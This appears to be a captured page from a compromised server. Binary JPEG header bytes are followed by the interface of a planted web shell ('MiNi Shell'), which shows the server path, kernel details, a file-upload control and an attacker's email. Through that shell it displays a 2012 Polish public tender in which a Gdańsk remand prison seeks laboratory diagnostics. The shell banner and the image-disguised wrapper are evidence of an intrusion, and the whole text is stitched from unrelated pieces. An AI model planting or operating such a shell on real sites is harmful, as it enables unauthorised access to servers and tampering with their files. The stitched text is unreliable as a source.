JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121015/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121015/399034-N-2012.html

<p class="kh_header"><b>Gdańsk: Przetarg nieograniczony nr 3/DSz/2012 na usługi zdrowotne w zakresie diagnostyki laboratoryjnej, mikrobiologicznej i serologii transfuzjologicznej</b><br>
<b>Numer ogłoszenia: 399034 - 2012; data zamieszczenia: 15.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 058 3231000, 3231260, faks 058 3025125.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony nr 3/DSz/2012 na usługi zdrowotne w zakresie diagnostyki laboratoryjnej, mikrobiologicznej i serologii transfuzjologicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi zdrowotne w zakresie diagnostyki laboratoryjnej, mikrobiologicznej i serologii transfuzjologicznej na potrzeby Aresztu Śledczego w Gdańsku od 1.11.2012r. przez okres 24 miesięcy.

Szacunkowa, przewidywana przez Zamawiającego wielkość zamówienia przez okres 24 miesięcy wynosi: AFP- FETOPROTEINA 10 szt., AMINOTRANSFERAZA ALANINOWA-ALAT 1000 szt. , ALBUMINA 30 szt., AMONIAK 10 szt., AMYLAZA 200 szt., AMYLAZA W MOCZU 100 szt., ANTY Hbs 150 szt., ANTY HCV 800 szt., ANTYTROMBINA III 5 szt., CZAS KAOLINOWO-KEFALINOWY APTT 100 szt., ASO 30 szt., AspAT 1000 szt., BADANIE HISTOPATOLOGICZNE 5 szt., BADANIE OGÓLNE MOCZU 1500 szt., BADANIE PŁYNU 20 szt., BENZODIAZEPINY 2 szt., BETA HCG  szt. 2, BIAŁKO C W OSOCZU 5 szt., BIAŁKO CAŁKOWITE 30 szt., BIAŁKO S W OSOCZU 5 szt., BILIRUBINA CAŁ. 500 szt., BNP 15 szt., BORELIOZA IGG 10 szt., BORELIOZA IGM 4 szt., BUN 2 szt., CA 125 5 szt., CEA 10 szt., CERULOPLAZMINA 2 szt., CHOLESTEROL 30 szt., CHOLINESTERAZA 2 szt., CK 30 szt., CKMB MASS 20 szt., C-PEPTYD 3 szt., CRP 1000 szt., CYTOLOGIA 20 szt., CZAS TROMBINOWY 10 szt., CZYNNIK II/V/APC-GENOTYPOWANIE 5 szt., D-DIMER 80 szt., DOBOWA UTRATA BIAŁKA Z MOCZEM 10 szt., ELEKTROLITY 1300 szt., ERYTROPOETYNA 2 szt.,  ETANOL 5 szt., FERRYTYNA 10 szt., FIBRYNOGEN 60 szt., FOSFATAZA ALKALICZNA 80 szt., FOSFATAZA ALKALICZNA GRANUL. 5 szt., FOSFOR 30 szt., fPSA 5 szt., fT3 100 szt., fT4 150 szt., FTA (ILOŚCIOWO) 10 szt., GGTP 300 szt., GLUK 0/30/60/90/120 10 szt., GLUKOZA 1000 szt., GLUKOZA 50G 10 szt., GLUKOZA 75G  0-120 40 szt., GLUKOZA 75G (0-60-120) 20 szt., GLUKOZA -PROFIL (1-7) 20 szt., GLUKOZA W MOCZU 5 szt., GLUKOZA-PROFIL (1-4) 10 szt., GRUPA KRWI 1X 150 szt., HBeAg 2 szt., HbA1C 70 szt., HBs Ag 500 szt., HCV RNA ILOŚCIOWO 20 szt., HCV RNA JAKOŚCIOWO 10 szt., HDL CHOLESTEROL 10 szt., HIV 200 szt., HOMOCYSTEINA 5 szt., IMMUNOGLOBULINA A 5 szt., IMMUNOGLOBULINA G 5 szt., IMMUNOGLOBULINA M 5 szt., INR  PT 500 szt., KAŁ BAD.PARAZYTOLOGICZNE 20 szt., KAŁ NOSICIELSTWO-1 SZT 1000 szt., KAŁ BADANIE OGÓLNE 10 szt., KAŁ-KREW UTAJONA 50 szt., KARBAMAZEPINA (AMIZEPINA) 30 szt., KLIRENS KREATYNINY 5 szt., KOMÓRKI NEO 5 szt., KREATYNINA 1200 szt., KRZYWA ŻELAZOWA 5 szt., KWAS FOLIOWY 5 szt., KWAS MOCZOWY 70 szt., KWAS WALPROINOWY 20 szt., LDH 20 szt., LDL CHOLESTEROL 10 szt., LIPAZA 15 szt.,  MAGNEZ 20 szt., MIKROALBUMINURIA 5 szt., MOCZ W KIERUNKU BK- POSIEW 5 szt., MOCZNIK 600 szt., MORFOLOGIA KRWI 2500 szt., OCENA MIKROSKOPOWA SZPIKU 10 szt., ODCZYN BIERNACKIEGO 800 szt., ODCZYN WAALER-ROSE 10 szt., OSAD MOCZU- BAD CYTOL 5 szt., OPIATY W  MOCZU 2 szt., P/C HELIKOBAKTER PYLORI 4 szt., P/CIAŁA ANTY D 4 szt., P/PRZECIW RECEPT ACETYLOCHOLI 2 szt., P-CIALA P-KARDIOLIPINIE IGA 2 szt., P-CIALA P-KARDIOLIPINIE IGG 2 szt., P-CIALA P-KARDIOLIPINIE IGM 2 szt., P-CIAŁA P/JĄDROWE (ANA) 2 szt., PLWOCINA NA BK -PREP.BEZP. 20 szt., PLWOCINA NA BK-POSIEW+PREPAR 500 szt., PŁYN Z JAMY OPŁUCNEJ NA BK 10 szt., PŁYTKI KRWI NA CYTRYNIAN 5 szt., POTAS 100 szt., PROFIL LIPIDOWY 200 szt., PROGESTERON 5 szt., PROKALCYTONINA 2 szt., PROLAKTYNA 10 szt., PROTEINOGRAM 20 szt., PRÓBA KRZYŻOWA 20 szt., PSA 50 szt., PTH 2 szt., RETIKULOCYTY 30 szt., RF 20 szt., RNA WIRUSA HIV 10 szt., RÓWNOWAGA KWASOWO ZASADOWA 130 szt., SÓD 100 szt., SUBPOPULACJA LIMFOC. CD4/CD8 15 szt., T3 20 szt., T4 20 szt., TEST POTWIERDZENIA HBS 20 szt., TEST POTWIERDZENIA HIV (WB) 2 szt., TIBC 20 szt., TRANSFERYNA 5 szt., TRIGLICERYDY 20 szt., TROPONINA T 200 szt., TSH 200 szt., VDRL (ILOŚCIOWO) 20 szt., VIT B12 15 szt., WANKOMYCYNA 2 szt., WAPŃ 50 szt., WAPŃ W MOCZU 5 szt., WAPŃ ZJONIZOWANY 5 szt., WR 10 szt., WZÓR ODSETKOWY LEUKOCYTÓW 50 szt., ŻELAZO 150 szt.,  POSIEW ILOŚCIOWY MOCZU I OZNACZANIE LEKOOPORNOŚCI 60 szt., POSIEW KAŁU BADANIE ROZSZERZONE 10 szt., POSIEW KALU W KIERUNKU SALMONELLA-SHIGELLA 20 szt., POSIEW KRWI BEZTLENOWO 30 szt., POSIEW KRWI TLENOWO 30 szt., POSIEW PLWOCINY 20 szt., POSIEW PŁYNU Z JAMY OPŁUCNEJ 20 szt., POSIEW ROPY W WARUNKACH TLENOWYCH I BEZTLENOWYCH 10 szt., POSIEW W KIERUNKU DROZDZAKÓW 5 szt., POSIEW W KIERUNKU NOSICIELSTWA  GRONKOWCA ZŁOCISTEGO 5 szt., SPORALE A-KONTROLA JAŁOWOŚCI AUTOKLAWU KRĄZKI 12 szt., SPORALE S KONTROLA JAŁOWOŚCI STERYLIZATORÓW NA GORĄCE POWIETRZE 5 szt., TEST NA OBECNOŚC RSV 2 szt., TEST NA OBECNOSC TOKSYNY CLOSTRIDIUM DIFFICILE 5 szt., TEST W KIERUNKU WIRUSA GRYPY TYPU A I B 2 szt., WYMAZ Z CEWKI MOCZOWEJ 2 szt., WYMAZ Z GARDŁA 2 szt., WYMAZ Z NOSA 2 szt., WYMAZ Z POCHWY 10 szt., WYMAZ ZE SKÓRY 2 szt., 
Ilości wyżej wymienione to ilości średnie. W przypadku zlecenia mniejszej ilości badań od wyżej wymienionych, wykonawcy nie przysługują żadne roszczenia. 

Miejsce i sposób oraz warunki realizacji zamówienia:
a) Codzienny odbiór materiału z Aresztu Śledczego w Gdańsku zapewnia  wykonawca. Odbiór materiału następować będzie w dni robocze w godzinach 9.00-11.00, zaś materiału badań pilnych w ciągu 1 godziny od zgłoszenia od Zamawiającego.
b) Wykonawca zorganizuje sposób odbioru materiału do badań pilnych w sposób umożliwiający jego odbiór w ciągu 1 godziny od zgłoszenia.
c) Wyniki badań pilnych powinny być dostępne w oparciu o system informatyczny wykonawcy na jego stronie internetowej, bądź wysłane poczta elektroniczną na adres zamawiającego w ciągu godziny od odebrania materiału od wykonawcy. Dotyczy badan wyszczególnionych w tabeli jak wyżej pod numerami: 
2,3,5,6,9,10,12,14,19,21,31,32,34,36.38,39,40,44,45,49,50,54,61,73,79,81,84,92,93,95,109,110,116,119,122,123 ,125,126,132,133,137,141,142,
d) wyniki badań rutynowych wykonywanych w systemie całodobowym powinny być dostępne w oparciu o system informatyczny wykonawcy na jego stronie internetowej, bądź wysłane pocztą elektroniczną na adres zamawiającego w ciągu 4 godzin od odebrania materiału przez wykonawcę. Dotyczy badań wyszczególnionych w tabeli jak wyżej pod numerami:
1,2,3,5,6,7,8,9,10,11,12,14,19,21,27,28,29,31,32,34,36,38,39,40,43,44,45,49,50,52,54,61,64,67,68,73,74,77,79,81,84,85,86,87,89,92,93,95,96,109,110,111,114,115,116,117,119,120.122,123,125,126,129,130,131,132,133,137,141,142. 
e) Wyniki pozostałych badań powinny być dostępne w oparciu o system informatyczny wykonawcy na jego stronie internetowej, bądź wysłane droga elektroniczną na adres zamawiającego w ciągu 7 dni od odebrania materiału, chyba że standardowa technologia wykonania jest bardziej czasochłonna.   
f) Szkolenie personelu medycznego punktu pobrań w Areszcie Śledczym w Gdańsku z zakresu technik pobierania, sortowania,  transportu oraz odbioru wyników zostanie przeprowadzone przez wykonawcę przed dniem wejścia w życie umowy.   
g) Materiał zużywalny ( system próżniowy ) oraz inne materiały i sprzęt służący do pobierania i przechowywania materiału do badań dostarcza wykonawca w ramach umowy i ceny badań. 
h) Na każde żądanie zamawiającego wykonawca okaże referencje dotyczące współpracy z zakładami opieki zdrowotnej w zakresie diagnostyki laboratoryjnej i mikrobiologii oraz dokumenty potwierdzające posiadaną przez pracowników zatrudnionych i wykonujących prace w laboratorium, specjalizację drugiego stopnia z zakresu diagnostyki laboratoryjnej lub analityki klinicznej.   
i) Wyniki badań histopatologicznych - materiał z gastroskopii, kolonoskopii i wycinki ze zmian skórnych będą dostępne w czasie przewidzianym w procedurach okresu wykonania badań..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.14.50.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kopia księgi rejestrowej zakładu opieki zdrowotnej oferenta. Wypełnione oświadczenie wykonawcy o spełnianiu wymagań stanąwiące załącznik do SIWZ nr 3/DSz/2012.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Pełen panel oznaczeń wykonywanych przez laboratorium oferenta. Dokument potwierdzający posiadanie Certyfikatu Akredytacji wydanego przez PCA potwierdzający spełnienie wymagań normy PN-EN ISO/IEC 17025:2005. Wypełnione oświadczenie wykonawcy o spełnianiu wymagań stanąwiące załącznik do SIWZ nr 3/DSz/2012.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dokumenty potwierdzające prowadzenie outsourcingu w zakładzie opieki zdrowotnej - np. kopia umowy. Pełen panel oznaczeń wykonywanych przez laboratorium oferenta. Dokument potwierdzający posiadanie Certyfikatu Akredytacji wydanego przez PCA potwierdzający spełnienie wymagań normy PN-EN ISO/IEC 17025:2005. Wypełnione oświadczenie wykonawcy o spełnianiu wymagań stanąwiące załącznik do SIWZ nr 3/DSz/2012.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dokumenty potwierdzające prowadzenie outsourcingu w zakładzie opieki zdrowotnej - np. kopia umowy. Pełen panel oznaczeń wykonywanych przez laboratorium oferenta. Wypełnione oświadczenie wykonawcy o spełnianiu wymagań stanąwiące załącznik do SIWZ nr 3/DSz/2012.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dokumenty potwierdzające prowadzenie outsourcingu w zakładzie opieki zdrowotnej - np. kopia umowy. Wypełnione oświadczenie wykonawcy o spełnianiu wymagań stanąwiące załącznik do SIWZ nr 3/DSz/2012.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające prowadzenie outsourcingu w zakładzie opieki zdrowotnej - np. kopia umowy. Pełen panel oznaczeń wykonywanych przez laboratorium oferenta. Dokument potwierdzający posiadanie Certyfikatu Akredytacji wydanego przez PCA potwierdzający spełnienie wymagań normy PN-EN ISO/IEC 17025:2005. Kopię księgi rejestrowej zakładu opieki zdrowotnej oferenta</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy - załącznik nr 4 do SIWZ. Na podstawie art. 144 Ustawy Zamawiający dopuszcza  możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, jeżeli zmiany te są korzystne dla Zamawiającego lub konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany sposobu przeprowadzenia badania. Warunkiem takiej zmiany jest podpisanie aneksu do istniejącej umowy oraz udokumentowanie w/w okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Kurkowa 12; 80-803 Gdańsk, fax (580 302-51-25, e-mail: as_gdansk@sw.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2012 godzina 13:30, miejsce: sekretariat aresztu Śledczego w Gdańsku ul. Kurkowa 12; 80-803 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com